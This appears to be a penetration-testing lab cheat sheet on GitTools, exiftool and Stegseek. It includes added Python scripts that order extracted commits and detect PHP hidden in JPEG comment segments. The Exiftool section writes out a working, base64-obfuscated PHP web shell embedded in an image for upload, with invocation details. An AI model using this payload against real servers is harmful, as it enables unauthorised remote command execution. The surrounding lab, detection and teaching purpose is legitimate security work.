Miscellaneous Tools
GitTools
Clone the GitTools repository into your current directory using:
git clone https://github.com/internetwache/GitTools
The GitTools repository contains three tools:
- Dumper downloads an exposed .git directory from a website whose owner forgot to delete it (or to block access to it).
- Extractor takes a local .git directory and recreates the repository in a readable format, one directory per commit. It is designed to work in conjunction with Dumper, but it will also work on the repository we stole from the Git server. Unfortunately for us, while Extractor gives us each commit in a readable format, it does not sort the commits by date, so the numbering of the output directories says nothing about the order in which the commits were made.
- Finder searches the internet for sites with exposed .git directories. This is significantly less useful to an ethical hacker working within an agreed scope, although it may have applications in bug bounty programs.
The syntax for Extractor is as follows:
./extractor.sh REPO_DIR DESTINATION_DIR
This is slightly confusing, so to explain each option:
- REPO_DIR is the directory containing the .git directory for the repository. Note that this is not the .git directory itself: Extractor looks for a .git directory inside the specified directory (which is why we had to rename the directory we stole to ".git").
- DESTINATION_DIR is the directory into which the recreated commits will be written, one subdirectory per commit.
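Because Extractor does not order its output by date, it helps to rebuild a timeline from the commit metadata it leaves next to each recreated commit. The script below is an added example, not part of the original page or of GitTools. It assumes (check your own output) that each commit directory is named `<index>-<hash>` and contains a `commit-meta.txt` holding the raw `git cat-file -p` output for that commit; the sample metadata embedded in `SAMPLE_METAS` is constructed for the example, with shortened hashes.

```python
"""Order GitTools Extractor output by commit date (added example)."""
from datetime import datetime, timezone
from pathlib import Path

# Constructed sample: what each commit-meta.txt is assumed to hold, i.e. raw
# `git cat-file -p <commit>` output. The directory index reflects the order in
# which Extractor found the objects, not the order in which they were written.
SAMPLE_METAS = {
    "0-c0ffee11": (
        "tree 1a2b3c4d\n"
        "parent deadbe22\n"
        "author Dev <dev@example.com> 1600000300 +0000\n"
        "committer Dev <dev@example.com> 1600000300 +0000\n"
        "\n"
        "Remove hard-coded credentials\n"
    ),
    "1-deadbe22": (
        "tree 5e6f7a8b\n"
        "parent feed0033\n"
        "author Dev <dev@example.com> 1600000200 +0000\n"
        "committer Dev <dev@example.com> 1600000200 +0000\n"
        "\n"
        "Add database config\n"
    ),
    "2-feed0033": (
        "tree 9c0d1e2f\n"
        "author Dev <dev@example.com> 1600000100 +0000\n"
        "committer Dev <dev@example.com> 1600000100 +0000\n"
        "\n"
        "Initial commit\n"
    ),
}


def parse_commit_meta(text: str) -> dict:
    """Parse `git cat-file -p` commit output into header fields and message."""
    header, _, message = text.partition("\n\n")
    meta = {"parents": [], "message": message.strip()}
    for line in header.splitlines():
        key, _, value = line.partition(" ")
        if key == "tree":
            meta["tree"] = value
        elif key == "parent":
            meta["parents"].append(value)
        elif key in ("author", "committer"):
            # "Name <email> <unix-timestamp> <tz>"; the identity itself may contain spaces
            ident, ts, tz = value.rsplit(" ", 2)
            meta[key] = ident
            meta[f"{key}_time"] = int(ts)
            meta[f"{key}_tz"] = tz
        # other headers (gpgsig, encoding) and their continuation lines are skipped
    return meta


def order_by_date(metas: dict[str, str]) -> list[tuple[str, int, str]]:
    """Return (directory, committer timestamp, subject line), oldest first."""
    rows = []
    for dirname, text in metas.items():
        meta = parse_commit_meta(text)
        subject = meta["message"].splitlines()[0] if meta["message"] else ""
        rows.append((dirname, meta["committer_time"], subject))
    return sorted(rows, key=lambda row: row[1])


def load_extracted(dest_dir: str, meta_name: str = "commit-meta.txt") -> dict[str, str]:
    """Read <dest_dir>/<index>-<hash>/<meta_name> for every commit directory."""
    metas = {}
    for sub in Path(dest_dir).iterdir():
        meta_file = sub / meta_name
        if sub.is_dir() and meta_file.is_file():
            metas[sub.name] = meta_file.read_text(errors="replace")
    return metas


def format_timeline(rows: list[tuple[str, int, str]]) -> list[str]:
    """One line per commit: UTC date, directory, subject."""
    return [
        f"{datetime.fromtimestamp(ts, timezone.utc):%Y-%m-%d %H:%M:%S}  {dirname}  {subject}"
        for dirname, ts, subject in rows
    ]


if __name__ == "__main__":
    import sys
    # Pass an Extractor DESTINATION_DIR to use real output; otherwise use the sample.
    metas = load_extracted(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_METAS
    print("\n".join(format_timeline(order_by_date(metas))))
```

Run it as `python3 order_commits.py DESTINATION_DIR` to list the recreated commits oldest first; the committer timestamp is used rather than the author timestamp because it reflects when the commit actually entered the repository (rebases and cherry-picks keep the original author date).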
Exiftool
Inserting a PHP shell into a legitimate image
exiftool -Comment="<?php echo \"<pre>Test Payload</pre>\"; die(); ?>" test-sarper.jpeg.php
exiftool -Comment="<?php \$h0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$h0)){echo base64_decode('PHByZT4=').shell_exec(\$h0).base64_decode('PC9wcmU+');}die();?>" test-sarper.jpeg.php
The -Comment tag writes the JPEG COM segment, so the PHP survives as long as the target stores the uploaded bytes unchanged; a server that re-encodes images (resizing, stripping metadata) will drop it. The backslashes in front of $h0 and $_GET stop bash from expanding them before exiftool sees the string, and \" is how a double quote is written inside a double-quoted argument. The first payload is a harmless marker: if "Test Payload" appears in the response, the file is being executed as PHP. The second one reads a command from the GET parameter named by base64_decode('d3JlYXRo'), which is "wreath", runs it with shell_exec() and wraps the output in <pre> tags (also base64-encoded, so that neither the parameter name nor the tags appear in the file as plain text); it is invoked as test-sarper.jpeg.php?wreath=id. Both depend on the web server executing a file with a .jpeg.php name as PHP.
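To confirm the comment actually landed in the file before uploading it, or, from the defensive side, to spot such uploads at rest, the following added script walks the JPEG marker segments and reports any COM segment that contains a PHP open tag. It is not part of the original page or of exiftool; the JPEG bytes it builds for its own test are constructed inline (a JFIF header and a COM segment, with no image data), so it runs offline, and passing a file path scans a real image instead.

```python
"""Find JPEG COM segments carrying PHP (added example)."""
import struct

COM, SOS, EOI = 0xFE, 0xDA, 0xD9
# Markers with no length field: TEM and the restart markers RST0-RST7
STANDALONE = {0x01, *range(0xD0, 0xD8)}
PHP_OPENERS = ("<?php", "<?=")

# Constructed sample: the comment the first exiftool command above stores
PHP_PAYLOAD = b'<?php echo "<pre>Test Payload</pre>"; die(); ?>'


def build_jpeg_with_comment(comment: bytes) -> bytes:
    """Constructed test input: SOI + JFIF APP0 + COM + EOI.
    It has no frame or scan, so it is not a viewable picture, but the marker
    layout matches where exiftool -Comment= places the comment in a real file."""
    app0_body = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    app0 = b"\xff\xe0" + struct.pack(">H", len(app0_body) + 2) + app0_body
    com = b"\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment
    return b"\xff\xd8" + app0 + com + b"\xff\xd9"


def iter_segments(data: bytes):
    """Yield (marker, payload) for every marker segment before the scan data."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        while pos < len(data) and data[pos] == 0xFF:  # skip 0xFF fill bytes
            pos += 1
        if pos >= len(data):
            raise ValueError("truncated marker")
        marker = data[pos]
        pos += 1
        if marker == EOI:
            return
        if marker in STANDALONE:
            yield marker, b""
            continue
        if pos + 2 > len(data):
            raise ValueError("truncated segment length")
        (length,) = struct.unpack(">H", data[pos:pos + 2])  # length includes its own 2 bytes
        if length < 2 or pos + length > len(data):
            raise ValueError(f"bad segment length {length} at offset {pos}")
        yield marker, data[pos + 2:pos + length]
        pos += length
        if marker == SOS:  # entropy-coded image data follows; metadata segments precede it
            return


def extract_comments(data: bytes) -> list[bytes]:
    """Raw payload of every COM segment in the file."""
    return [payload for marker, payload in iter_segments(data) if marker == COM]


def find_php_in_comments(data: bytes) -> list[str]:
    """Decoded text of each COM segment that contains a PHP open tag."""
    hits = []
    for comment in extract_comments(data):
        text = comment.decode("latin-1")  # one byte per character, never fails
        if any(opener in text for opener in PHP_OPENERS):
            hits.append(text)
    return hits


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
    else:
        data = build_jpeg_with_comment(PHP_PAYLOAD)
    for text in find_php_in_comments(data):
        print("PHP in COM segment:", text)
```

Run `python3 find_php_comment.py test-sarper.jpeg.php` after the exiftool command to see the stored comment; an empty result means the comment was not written or the file was re-encoded. Note that this only covers the COM segment: exiftool can place text in EXIF and XMP segments (APP1) as well, which the scan would have to parse separately.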
Stegseek
Stegseek is a lightning-fast steghide cracker that can be used to extract hidden data from files. It is built as a fork of the original steghide project, which lets it check candidate passphrases far faster than crackers that call steghide externally: it is thousands of times faster than other crackers and can run through the entirety of rockyou.txt in under 2 seconds.
Stegseek can also extract the steghide metadata (the embedded file's name and size) without a password using its --seed mode, which is a quick way to test whether a file contains steghide data at all before spending time on a wordlist.
stegseek [stegofile.jpg] [wordlist.txt]